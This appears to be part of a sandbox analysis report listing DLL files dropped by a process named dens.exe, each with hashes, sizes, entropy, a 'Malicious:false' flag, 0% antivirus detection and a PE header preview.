                                                                                                                                                                                                                                            SSDEEP:192:/Mck1JzX9cKSI0WqhWsWJWadJCsVWQ4mWClLeyttuX01k9z3A2XCJq:Uck1JzNcKSI0WqhWZCsvfSR9zfyk
                                                                                                                                                                                                                                            MD5:C3632083B312C184CBDD96551FED5519
                                                                                                                                                                                                                                            SHA1:A93E8E0AF42A144009727D2DECB337F963A9312E
                                                                                                                                                                                                                                            SHA-256:BE8D78978D81555554786E08CE474F6AF1DE96FCB7FA2F1CE4052BC80C6B2125
                                                                                                                                                                                                                                            SHA-512:8807C2444A044A3C02EF98CF56013285F07C4A1F7014200A21E20FCB995178BA835C30AC3889311E66BC61641D6226B1FF96331B019C83B6FCC7C87870CCE8C4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......9&....`A........................................p................0...............0..x&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.799245167892134
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:R0DfIeUWqhWLWJWadJCsVWQ4mWFVyttuX01k9z3A2YHmp:R0DfIeUWqhWiCsLSR9zfYHmp
                                                                                                                                                                                                                                            MD5:517EB9E2CB671AE49F99173D7F7CE43F
                                                                                                                                                                                                                                            SHA1:4CCF38FED56166DDBF0B7EFB4F5314C1F7D3B7AB
                                                                                                                                                                                                                                            SHA-256:57CC66BF0909C430364D35D92B64EB8B6A15DC201765403725FE323F39E8AC54
                                                                                                                                                                                                                                            SHA-512:492BE2445B10F6BFE6C561C1FC6F5D1AF6D1365B7449BC57A8F073B44AE49C88E66841F5C258B041547FCD33CBDCB4EB9DD3E24F0924DB32720E51651E9286BE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@.......,....`A........................................p................0...............0..x&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.587063911311469
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:fWqhWeWJWadJCsVWQ4mWMs7DENNVAv+cQ0GX01k9z3ARoIGA/:fWqhWbCs8oNbZR9zQoxS
                                                                                                                                                                                                                                            MD5:F3FF2D544F5CD9E66BFB8D170B661673
                                                                                                                                                                                                                                            SHA1:9E18107CFCD89F1BBB7FDAF65234C1DC8E614ADD
                                                                                                                                                                                                                                            SHA-256:E1C5D8984A674925FA4AFBFE58228BE5323FE5123ABCD17EC4160295875A625F
                                                                                                                                                                                                                                            SHA-512:184B09C77D079127580EF80EB34BDED0F5E874CEFBE1C5F851D86861E38967B995D859E8491FCC87508930DC06C6BBF02B649B3B489A1B138C51A7D4B4E7AAAD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.754374422741657
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:CGeVPWqhWUWJWadJCsVWQ4mWUhSqyttuX01k9z3A2lqn7cq:CGeVPWqhWBCsvoSR9zflBq
                                                                                                                                                                                                                                            MD5:A0C2DBE0F5E18D1ADD0D1BA22580893B
                                                                                                                                                                                                                                            SHA1:29624DF37151905467A223486500ED75617A1DFD
                                                                                                                                                                                                                                            SHA-256:3C29730DF2B28985A30D9C82092A1FAA0CEB7FFC1BD857D1EF6324CF5524802F
                                                                                                                                                                                                                                            SHA-512:3E627F111196009380D1687E024E6FFB1C0DCF4DCB27F8940F17FEC7EFDD8152FF365B43CB7FDB31DE300955D6C15E40A2C8FB6650A91706D7EA1C5D89319B12
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.664553499673792
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:mZyMvr5WqhWAWJWadJCsVWQ4mWWqpNVAv+cQ0GX01k9z3ARo+GZ:mZyMvlWqhWNCsUpNbZR9zQo+GZ
                                                                                                                                                                                                                                            MD5:2666581584BA60D48716420A6080ABDA
                                                                                                                                                                                                                                            SHA1:C103F0EA32EBBC50F4C494BCE7595F2B721CB5AD
                                                                                                                                                                                                                                            SHA-256:27E9D3E7C8756E4512932D674A738BF4C2969F834D65B2B79C342A22F662F328
                                                                                                                                                                                                                                            SHA-512:BEFED15F11A0550D2859094CC15526B791DADEA12C2E7CEB35916983FB7A100D89D638FB1704975464302FAE1E1A37F36E01E4BEF5BC4924AB8F3FD41E60BD0C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):5.146069394118203
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:vUwidv3V0dfpkXc0vVaCsWqhWjCsa2IR9z5Bk5l:sHdv3VqpkXc0vVaP+U9zzk5l
                                                                                                                                                                                                                                            MD5:225D9F80F669CE452CA35E47AF94893F
                                                                                                                                                                                                                                            SHA1:37BD0FFC8E820247BD4DB1C36C3B9F9F686BBD50
                                                                                                                                                                                                                                            SHA-256:61C0EBE60CE6EBABCB927DDFF837A9BF17E14CD4B4C762AB709E630576EC7232
                                                                                                                                                                                                                                            SHA-512:2F71A3471A9868F4D026C01E4258AFF7192872590F5E5C66AABD3C088644D28629BA8835F3A4A23825631004B1AFD440EFE7161BB9FC7D7C69E0EE204813CA7B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@.......J....`A........................................p...X............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.834520503429805
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:etZ3xWqhWqWJWadJCsVWQ4mWfH/fKUSIX01k9z3AEXz40OY:etZ3xWqhWHCsMH2IR9z5OY
                                                                                                                                                                                                                                            MD5:1281E9D1750431D2FE3B480A8175D45C
                                                                                                                                                                                                                                            SHA1:BC982D1C750B88DCB4410739E057A86FF02D07EF
                                                                                                                                                                                                                                            SHA-256:433BD8DDC4F79AEE65CA94A54286D75E7D92B019853A883E51C2B938D2469BAA
                                                                                                                                                                                                                                            SHA-512:A954E6CE76F1375A8BEAC51D751B575BBC0B0B8BA6AA793402B26404E45718165199C2C00CCBCBA3783C16BDD96F0B2C17ADDCC619C39C8031BECEBEF428CE77
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......w....`A........................................p...x............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.916367637528538
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:qaIMFSYWqhWzWJWadJCsVWQ4mW14LyttuX01k9z3A2ClV:qdYWqhWqCsISR9zfCT
                                                                                                                                                                                                                                            MD5:FD46C3F6361E79B8616F56B22D935A53
                                                                                                                                                                                                                                            SHA1:107F488AD966633579D8EC5EB1919541F07532CE
                                                                                                                                                                                                                                            SHA-256:0DC92E8830BC84337DCAE19EF03A84EF5279CF7D4FDC2442C1BC25320369F9DF
                                                                                                                                                                                                                                            SHA-512:3360B2E2A25D545CCD969F305C4668C6CDA443BBDBD8A8356FFE9FBC2F70D90CF4540F2F28C9ED3EEA6C9074F94E69746E7705E6254827E6A4F158A75D81065B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.829681745003914
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:HNpWqhW5WJWadJCsVWQ4mWbZyttuX01k9z3A2qkFU:HXWqhW4Cs1SR9zf9U
                                                                                                                                                                                                                                            MD5:D12403EE11359259BA2B0706E5E5111C
                                                                                                                                                                                                                                            SHA1:03CC7827A30FD1DEE38665C0CC993B4B533AC138
                                                                                                                                                                                                                                            SHA-256:F60E1751A6AC41F08E46480BF8E6521B41E2E427803996B32BDC5E78E9560781
                                                                                                                                                                                                                                            SHA-512:9004F4E59835AF57F02E8D9625814DB56F0E4A98467041DA6F1367EF32366AD96E0338D48FFF7CC65839A24148E2D9989883BCDDC329D9F4D27CAE3F843117D0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@............`A........................................p...H............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.612408827336625
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:CWqhW+WJWadJCsVWQ4mWprgfKUSIX01k9z3AEXzh:CWqhW7Cs12IR9z5F
                                                                                                                                                                                                                                            MD5:0F129611A4F1E7752F3671C9AA6EA736
                                                                                                                                                                                                                                            SHA1:40C07A94045B17DAE8A02C1D2B49301FAD231152
                                                                                                                                                                                                                                            SHA-256:2E1F090ABA941B9D2D503E4CD735C958DF7BB68F1E9BDC3F47692E1571AAAC2F
                                                                                                                                                                                                                                            SHA-512:6ABC0F4878BB302713755A188F662C6FE162EA6267E5E1C497C9BA9FDDBDAEA4DB050E322CB1C77D6638ECF1DAD940B9EBC92C43ACAA594040EE58D313CBCFAE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.918215004381039
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:OvMWqhWkWJWadJCsVWQ4mWoz/HyttuX01k9z3A21O:JWqhWxCs/SSR9zf1O
                                                                                                                                                                                                                                            MD5:D4FBA5A92D68916EC17104E09D1D9D12
                                                                                                                                                                                                                                            SHA1:247DBC625B72FFB0BF546B17FB4DE10CAD38D495
                                                                                                                                                                                                                                            SHA-256:93619259328A264287AEE7C5B88F7F0EE32425D7323CE5DC5A2EF4FE3BED90D5
                                                                                                                                                                                                                                            SHA-512:D5A535F881C09F37E0ADF3B58D41E123F527D081A1EBECD9A927664582AE268341771728DC967C30908E502B49F6F853EEAEBB56580B947A629EDC6BCE2340D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......UJ....`A.........................................................0...............0..x&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26216
                                                                                                                                                                                                                                            Entropy (8bit):4.882777558752248
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:I9cy5WqhWKWEXCVWQ4mW1pbm6yttuX01k9z3A2jyM:Ry5WqhWdcbmLSR9zfjj
                                                                                                                                                                                                                                            MD5:EDF71C5C232F5F6EF3849450F2100B54
                                                                                                                                                                                                                                            SHA1:ED46DA7D59811B566DD438FA1D09C20F5DC493CE
                                                                                                                                                                                                                                            SHA-256:B987AB40CDD950EBE7A9A9176B80B8FFFC005CCD370BB1CBBCAD078C1A506BDC
                                                                                                                                                                                                                                            SHA-512:481A3C8DC5BEF793EE78CE85EC0F193E3E9F6CD57868B813965B312BD0FADEB5F4419707CD3004FBDB407652101D52E061EF84317E8BD458979443E9F8E4079A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...U.gJ.........." .........@...............................................P............`A.........................................................@...............@..h&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.738587310329139
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:TWqhWXWEXCVWQ4mWPXTNyttuX01k9z3A2dGxr:TWqhWMKASR9zfYxr
                                                                                                                                                                                                                                            MD5:F9235935DD3BA2AA66D3AA3412ACCFBF
                                                                                                                                                                                                                                            SHA1:281E548B526411BCB3813EB98462F48FFAF4B3EB
                                                                                                                                                                                                                                            SHA-256:2F6BD6C235E044755D5707BD560A6AFC0BA712437530F76D11079D67C0CF3200
                                                                                                                                                                                                                                            SHA-512:AD0C0A7891FB8328F6F0CF1DDC97523A317D727C15D15498AFA53C07610210D2610DB4BC9BD25958D47ADC1AF829AD4D7CF8AABCAB3625C783177CCDB7714246
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......h*....`A............................................"............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):5.202163846121633
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:2pUEpnWlC0i5CBWqhWXLeWEXCVWQ4iW+/x6RMySX01k9z3Aza8Az629:2ptnWm5CBWqhWtWMR9zqaH629
                                                                                                                                                                                                                                            MD5:5107487B726BDCC7B9F7E4C2FF7F907C
                                                                                                                                                                                                                                            SHA1:EBC46221D3C81A409FAB9815C4215AD5DA62449C
                                                                                                                                                                                                                                            SHA-256:94A86E28E829276974E01F8A15787FDE6ED699C8B9DC26F16A51765C86C3EADE
                                                                                                                                                                                                                                            SHA-512:A0009B80AD6A928580F2B476C1BDF4352B0611BB3A180418F2A42CFA7A03B9F0575ED75EC855D30B26E0CCA96A6DA8AFFB54862B6B9AFF33710D2F3129283FAA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......M4....`A.........................................................0...............0..h&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.866983142029453
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:0vh8Y17aFBRsWqhW9AWEXCVWQ4mWCB4Lrp0KBQfX01k9z3ALkg5Z7:SL5WqhW9boRxB+R9z2kM7
                                                                                                                                                                                                                                            MD5:D5D77669BD8D382EC474BE0608AFD03F
                                                                                                                                                                                                                                            SHA1:1558F5A0F5FACC79D3957FF1E72A608766E11A64
                                                                                                                                                                                                                                            SHA-256:8DD9218998B4C4C9E8D8B0F8B9611D49419B3C80DAA2F437CBF15BCFD4C0B3B8
                                                                                                                                                                                                                                            SHA-512:8DEFA71772105FD9128A669F6FF19B6FE47745A0305BEB9A8CADB672ED087077F7538CD56E39329F7DAA37797A96469EAE7CD5E4CCA57C9A183B35BDC44182F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@............`A.........................................................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.828044267819929
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:dUnWqhWRWJWadJCsVWQ4mW+2PyttuX01k9z3A23y:cWqhWQCsHSR9zf3y
                                                                                                                                                                                                                                            MD5:650435E39D38160ABC3973514D6C6640
                                                                                                                                                                                                                                            SHA1:9A5591C29E4D91EAA0F12AD603AF05BB49708A2D
                                                                                                                                                                                                                                            SHA-256:551A34C400522957063A2D71FA5ABA1CD78CC4F61F0ACE1CD42CC72118C500C0
                                                                                                                                                                                                                                            SHA-512:7B4A8F86D583562956593D27B7ECB695CB24AB7192A94361F994FADBA7A488375217755E7ED5071DE1D0960F60F255AA305E9DD477C38B7BB70AC545082C9D5E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@.......-....`A............................................e............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):30328
                                                                                                                                                                                                                                            Entropy (8bit):5.14173409150951
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:r7yaFM4Oe59Ckb1hgmLVWqhW2CsWNbZR9zQoekS:/FMq59Bb1jnoFT9zGp
                                                                                                                                                                                                                                            MD5:B8F0210C47847FC6EC9FBE2A1AD4DEBB
                                                                                                                                                                                                                                            SHA1:E99D833AE730BE1FEDC826BF1569C26F30DA0D17
                                                                                                                                                                                                                                            SHA-256:1C4A70A73096B64B536BE8132ED402BCFB182C01B8A451BFF452EFE36DDF76E7
                                                                                                                                                                                                                                            SHA-512:992D790E18AC7AE33958F53D458D15BFF522A3C11A6BD7EE2F784AC16399DE8B9F0A7EE896D9F2C96D1E2C8829B2F35FF11FC5D8D1B14C77E22D859A1387797C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P..x&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.883012715268179
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:5eXrqjd7ZWqhW3WEXCVWQ4mW3Ql1Lrp0KBQfX01k9z3ALkjY/12:54rgWqhWsP1RxB+R9z2kjY/Y
                                                                                                                                                                                                                                            MD5:272C0F80FD132E434CDCDD4E184BB1D8
                                                                                                                                                                                                                                            SHA1:5BC8B7260E690B4D4039FE27B48B2CECEC39652F
                                                                                                                                                                                                                                            SHA-256:BD943767F3E0568E19FB52522217C22B6627B66A3B71CD38DD6653B50662F39D
                                                                                                                                                                                                                                            SHA-512:94892A934A92EF1630FBFEA956D1FE3A3BFE687DEC31092828960968CB321C4AB3AF3CAF191D4E28C8CA6B8927FBC1EC5D17D5C8A962C848F4373602EC982CD4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......N.....`A............................................x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26208
                                                                                                                                                                                                                                            Entropy (8bit):5.023753175006074
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:4mGqX8mPrpJhhf4AN5/KiFWqhWyzWEXCVWQ4OW4034hHssDX01k9z3AaYX2cWo:4ysyr77WqhWyI0oFDR9z9YH9
                                                                                                                                                                                                                                            MD5:20C0AFA78836B3F0B692C22F12BDA70A
                                                                                                                                                                                                                                            SHA1:60BB74615A71BD6B489C500E6E69722F357D283E
                                                                                                                                                                                                                                            SHA-256:962D725D089F140482EE9A8FF57F440A513387DD03FDC06B3A28562C8090C0BC
                                                                                                                                                                                                                                            SHA-512:65F0E60136AB358661E5156B8ECD135182C8AAEFD3EC320ABDF9CFC8AEAB7B68581890E0BBC56BAD858B83D47B7A0143FA791195101DC3E2D78956F591641D16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
